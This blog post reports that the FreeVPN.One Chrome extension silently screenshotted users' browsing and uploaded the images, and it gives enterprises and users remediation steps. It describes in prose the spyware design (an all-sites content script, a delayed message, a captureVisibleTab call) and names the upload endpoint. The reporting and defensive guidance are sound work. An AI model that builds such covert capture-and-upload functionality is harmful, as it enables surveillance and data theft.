|

Featured Chrome Extension “FreeVPN.One” Caught Screenshotting Users’ Browsing — Here’s What You Need to Know (and Do)

ByInnoVirtuoso

If you installed a “free” VPN Chrome extension to stay private online, this story will make you rethink that choice. Security researchers say the Featured Chrome extension FreeVPN.One silently captures screenshots of users’ browsing and sends them to a remote server—no obvious consent, no clear local processing, and plenty of enterprise data loss risk.

Here’s why that matters: screenshots can reveal anything on your screen—customer records, EMR dashboards, CRM notes, banking portals, source code, M&A decks, or internal URLs. In the wrong hands, a single image can be as damaging as a database dump. If your organization allows unmanaged browser extensions, this is a wake-up call.

In this guide, I’ll break down what happened, how the capture worked, why it bypassed typical defenses, and exactly how CISOs and users can respond today—without resorting to panic.

Credit: viewimage – shutterstock.com

What happened: a “Featured” extension behaving like spyware

According to Koi Security, the Chrome extension FreeVPN.One was found secretly capturing screenshots of users’ browsing sessions and uploading them to a server. Until recently, the extension displayed a verified badge in the Chrome Web Store. It still carries a “Featured” label—Google’s way of signaling an extension follows recommended practices in the store’s review program.

FreeVPN.One also touts an “AI Threat Detector” that claims to analyze webpages for safety. But researchers say triggering that feature caused a full-page screenshot to be captured and uploaded to aitd[.]one/analyze.php for server-side processing.

The extension’s own privacy policy reportedly admits it “may upload page screenshots and URLs to their secured servers.” The catch: the UI allegedly framed it as a one-time, local scan, while surveillance was already underway. The vendor responded that automatic screenshots were part of a Background Scanning feature meant to trigger only on suspicious domains, and that it was enabled by default but slated to move to explicit consent in a future update.

Whether you call it a misfeature or misuse, the result is the same: silent exfiltration of what’s on your screen.

How the screenshot capture worked under the hood

The researchers described a two-stage architecture. Here’s the simplified flow, in plain language:

1) A content script injects into every page
– The extension manifest includes a broad pattern (e.g., https:/// and http:///), letting it run on nearly any site.
– When a page loads, the content script waits about 1.1 seconds. This delay can help it avoid obvious detection and ensure the page is visually ready.

2) The background service worker grabs the image
– The content script sends a message (captureViewport) to the extension’s background service worker.
– The service worker calls Chrome’s privileged API to capture the visible tab.

That API is real and powerful: Chrome provides chrome.tabs.captureVisibleTab(), which lets extensions take a screenshot of the currently visible area. You can read the documentation here: chrome.tabs.captureVisibleTab(). Content scripts and service workers are standard extension building blocks, too: Content scripts and Service workers.

In short: if you grant an extension the right permissions, it can see a lot. And if it’s coded to capture and transmit, it can exfiltrate that data at speed.

Why this is especially dangerous for enterprises

Unmanaged browser extensions are a blind spot. They sit between endpoints and the web, with permissions that rival EDR agents—without the enterprise oversight. When employees install personal “free VPNs” on a work browser, they open a covert channel that typical network tools miss.

Industry voices are sounding the alarm:

  • “This poses a major threat to industries with mobile, remote, or hybrid workforces… including finance, healthcare, legal, technology, consulting, and media,” noted Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BYOD and frequent travel multiply the risk as employees seek privacy or geo-bypass tools.
  • Manish Rawat, analyst at TechInsights, pointed out that younger, tech-forward workforces often experiment with consumer-grade tools outside IT visibility.
  • Amit Jaju, senior managing director – India at Ankura Consulting, advises CISOs to inventory extensions across fleets, prioritize by permissions, look for screenshot API usage and outbound beacons, and move fast on blocklisting and cleanup.

Here’s the core problem: many organizations rely on default Chrome/Edge settings. Extensions sail through, persist after updates, and remain invisible to vulnerability management. Meanwhile, a single screenshot could expose PHI, PCI, IP, deal docs, admin panels, and session cookies visible on the page.

“Featured” in the Chrome Web Store doesn’t mean “safe for enterprise”

The “Featured” label on the Chrome Web Store reflects editorial selection and adherence to store guidelines—not a guarantee that an extension won’t change behavior after an update or use permissions in ways your enterprise would reject. Learn how the program works here: Featured badge overview.

Extensions can be updated silently. A trusted extension last month can become risky today if the publisher changes hands, monetizes data, or adds “security scanning” that ships your screens to a server. That’s why enterprises need policy controls—not store trust alone.

Indicators of exposure: how to tell if you or your org are affected

If FreeVPN.One or a similar extension is installed, treat it as potential exposure. Practical steps:

For individual users: – Check installed extensions:
– Chrome: Menu > Extensions > Manage Extensions.
– Edge: Menu > Extensions > Manage extensions.
– Look for “FreeVPN.One” or any VPN/proxy/“AI Threat Detector” extension you don’t recognize. – Review permissions:
– Does it have access to “Read and change all your data on all websites”?
– Does it say it can “Capture content of your screen” or similar? – Audit activity:
– In DevTools > Network, watch for calls to suspicious domains (e.g., aitd[.]one) when you click “scan” or load pages. – Remove it:
– Toggle off or Remove. Restart the browser.

For IT and security teams: – Inventory extensions fleet-wide:
– Use Chrome Browser Cloud Management or your MDM/endpoint suite to collect extension lists and versions.
– Prioritize by permissions: all-site access, scripting, tabs, activeTab, declarativeNetRequest, and especially screenshot APIs.
– Reference Chrome enterprise policy docs: Policy list. – Hunt for beacons:
– Query web proxies/CASB/EDR for outbound requests to suspicious domains noted in research.
– Look for spikes after extension updates. – Assess data at risk:
– Identify high-sensitivity apps likely exposed in screenshots (EMR, ERP, CRM, code repos, admin consoles).
– Assume pages visible in foreground could have been captured.

Immediate containment: what CISOs should do now

Speed matters. Screenshot exfiltration is quick and quiet. Take decisive action:

1) Blocklist and remove high-risk categories
– VPN/proxy, coupon/price trackers, “AI page analyzers,” search helpers, and PDF converters with broad permissions.
– Use ExtensionInstallBlocklist and ExtensionSettings policies to block or force-remove. Policy docs: Extension policies.

2) Rotate credentials and clear sessions for exposed users
– Force sign-outs from sensitive SaaS and IdPs.
– Require password changes and refresh MFA sessions.
– Clear Chrome browsing data, cookies, and local storage.

3) Move to an allowlist model
– Default-deny for all extensions.
– Maintain a curated allowlist of vetted extensions.
– Auto-quarantine on permission escalation: if an extension requests new powerful permissions, require admin approval.

4) Disable developer mode and sideloading
– Prevent users from loading unpacked extensions or installing from outside authorized stores.

5) Expand monitoring and DLP
– Add detections for chrome.tabs.captureVisibleTab and suspicious extension messaging patterns.
– Tighten egress controls and anomaly detection for outbound image or multipart/form-data bursts to unknown hosts.
– Consider remote browser isolation for privileged workflows.

6) Train continuously
– Explain the risks of “free” VPNs and browser utilities.
– Clarify that “Featured” or “Verified” store labels are not enterprise trust signals.
– Extend policies to contractors and BYOD via managed browsers.

For more on extension architecture and risks:
– Chrome extensions model: Extensions overview.
– Managing Chrome in enterprises: Chrome Browser Cloud Management.
– NIST guidance on access control and data protection: NIST SP 800-53.
– EFF on VPN trust and privacy concerns: Should you trust your VPN? (context on VPN trust models).

How this slipped by: the permission and UX problem

Two factors make this kind of behavior hard to spot:

  • Permission bundling: “Read and change all your data on all websites” covers a wide range of actions, from simple ad blocking to screenshot capture. Users accept it once and forget.
  • UI trust theater: A button labeled “AI Threat Detector” sounds helpful. If the UI implies “local scan,” most users won’t suspect a full-page screenshot is leaving the device.

This is the gray zone where “security features” can become surveillance. The extension’s privacy policy may disclose upload rights, but if the UX implies otherwise, it erodes informed consent.

Free VPNs: the harsh economics you should remember

If you’re not paying for the product, your data—and your screen—can become the product. VPNs are expensive to run: bandwidth, exit nodes, abuse handling, uptime. Free VPNs often monetize by injecting ads, harvesting traffic, or, as alleged here, exporting page content for “analysis.”

Even paid VPNs require trust: they can see connection metadata, sometimes more. If you must use a VPN for personal privacy, choose a reputable, audited provider and prefer native apps over browser extensions. And never mix personal privacy tools with enterprise browsing where sensitive data is in view.

A good explainer on VPN trust models: EFF on VPNs.

Practical guidance for end users

If you installed FreeVPN.One or similar extensions, here’s what to do:

  • Remove the extension now. Restart your browser.
  • Change passwords for any accounts you accessed recently, starting with work accounts, email, and financial services.
  • Log out of all sessions in your major apps and re-authenticate.
  • Enable MFA everywhere.
  • Review other installed extensions. Remove anything you don’t absolutely need.
  • Set “On all sites” access to “On click” for any remaining extensions that support it.

You can review and manage site access per extension in Chrome. Learn more about extension permissions here: Manage Chrome extension permissions.

A repeatable playbook for enterprises

To prevent this class of incident, adopt a layered approach:

1) Governance and policy
– Default-deny with an allowlist of extensions.
– Use ExtensionSettings to force-install approved tools and block risky categories.
– Disable Developer Mode and external sources.

2) Vetted catalog and reviews
– Security review for any extension before allowlisting.
– Check publisher reputation, update cadence, and permission scope.
– Pin review snapshots: if a new update requests broader permissions, quarantine until reviewed.

3) Visibility and telemetry
– Collect extension inventories per device and per profile.
– Maintain a permission risk score (all-site access > scripting > capture APIs > tabs/activeTab).
– Alert on newly installed extensions or permission escalations.

4) Data-centric controls
– Browser Isolation for sensitive apps (admin consoles, finance, healthcare).
– CASB/DLP inspecting uploads and screenshots leaving your network.
– Disable copy/paste or printing in high-risk contexts as needed.

5) User experience and education
– Offer safe alternatives: corporate VPNs, approved password managers, and sanctioned utilities.
– Explain the “Featured ≠ enterprise-safe” reality.
– Make it easy to request exceptions—frustrated users will find workarounds.

For policy references:
– Chrome enterprise policies: chromeenterprise.google/policies.
– Edge extension management via Group Policy: Microsoft Edge policies.

A note on Chrome, Edge, and other Chromium browsers

Extensions built for Chrome often run on Microsoft Edge, Brave, Opera, and other Chromium-based browsers. This increases the potential blast radius. If your fleet standardizes on Edge but allows Chrome Web Store installs, the same risks apply. Lock down both:

  • Edge: restrict installs to Microsoft’s Add-ons store or approved IDs; block Chrome Web Store installs if not required.
  • Chrome: use ExtensionInstallAllowlist/Blocklist and ExtensionSettings to enforce.

Note: Traditional Chrome on iOS does not support extensions. Desktop platforms are the primary concern, with limited extension support on some mobile Chromium variants outside official Chrome.

Transparency, consent, and the path forward

Let’s be fair: some extensions capture screenshots for legitimate features—full-page capture tools, visual QA, or accessibility checks. The difference is clear consent, local processing where possible, minimal permissions, and transparent UX.

If an extension claims to “analyze pages for threats,” it must be explicit when data leaves the device, what’s collected, how it’s secured, who can access it, and how long it’s stored. Anything less invites regulatory and reputational fallout, especially under privacy regimes like GDPR and HIPAA where screenshots can contain personal or protected health information.

For extension developers, the bar is rising. For enterprises, the solution isn’t to ban the web—it’s to govern it. Managed browsers, allowlists, and user education create a safer, faster path to productivity.

Key takeaways

  • A popular, Featured Chrome extension, FreeVPN.One, was observed capturing and uploading screenshots—an obvious data exfil risk.
  • The mechanism used standard Chrome APIs and a two-stage architecture (content script + background service worker).
  • Relying on Web Store labels is not enough. Enterprises must enforce allowlists, monitor permissions, and block risky categories.
  • Act now: remove unvetted VPN/coupon/helper extensions, rotate credentials, clear browser data, and tighten policies.
  • Educate users: “free” often means you pay with data. For privacy and security, choose vetted tools and keep work browsing extension-light.

If this was helpful, consider subscribing for more practical security breakdowns and enterprise-ready playbooks. Your future incident response team will thank you.

FAQ: People also ask

Q: Is FreeVPN.One safe to use?
A: Based on the reported behavior—automatic screenshot capture and uploads without clear consent—it should be treated as unsafe, especially in enterprise contexts. Remove it and rotate credentials for accounts accessed while it was installed.

Q: Can Chrome extensions take screenshots of my browsing?
A: Yes. Extensions with the right permissions can call APIs like chrome.tabs.captureVisibleTab() to capture the visible area of your tab. That’s why permission reviews and allowlists are critical. See the API docs: captureVisibleTab.

Q: What does the “Featured” badge in the Chrome Web Store mean?
A: It indicates editorial selection and adherence to store guidelines, not an enterprise security guarantee. Extensions can change behavior over time. Learn more: Chrome Web Store Featured badge.

Q: How do I remove a suspicious Chrome extension?
A: Chrome > Menu > Extensions > Manage Extensions > Remove. Then restart the browser. Clear cookies and site data, and change passwords for sensitive accounts. Repeat on any other browsers you use.

Q: How can my company block risky extensions?
A: Use Chrome enterprise policies like ExtensionInstallBlocklist and ExtensionSettings to default-deny and allowlist approved IDs. Enforce via MDM or Chrome Browser Cloud Management. Policy reference: Chrome enterprise policies.

Q: What should CISOs look for when triaging this incident?
A: Inventory extensions, prioritize high-permission items, hunt for screenshot API usage and outbound connections to suspicious domains, remove/block risky extensions, rotate credentials, clear browser data, and move to an allowlist model.

Q: Are free VPNs safe?
A: Often not. VPNs are costly to operate, so “free” versions may monetize via ads, data collection, or traffic analysis. If you need a VPN, choose a reputable, audited provider and avoid mixing personal privacy tools with enterprise browsing. Context: EFF on choosing VPNs.

Q: Do Edge and other browsers face the same risk?
A: Yes. Chromium-based browsers like Edge support similar extension models. Enforce allowlists and policies across all browsers in your fleet, not just Chrome.

Q: How do I check an extension’s permissions?
A: In Chrome, go to Manage Extensions, click Details on the extension, and review “Site access” and permissions. Set access to “On click” where possible, or remove if unclear.

Q: What if an extension needs screenshots for a legitimate feature?
A: It must provide explicit, informed consent, use minimal permissions, process locally when possible, and be transparent about any uploads. Enterprises should still review and allowlist before deployment.

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring! 

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!

Read more related Articles at InnoVirtuoso

InnoVirtuoso

Hello there! I'm passionate content writer navigating the digital landscape. With a deep love for words and an insatiable curiosity about technology.

With 10 years of experience in IT field, I write mostly about emerging tech, sharing news, informational articles and covering other topics I find interesting.

Let's craft the future of content together – one word at a time!

Browse InnoVirtuoso for more!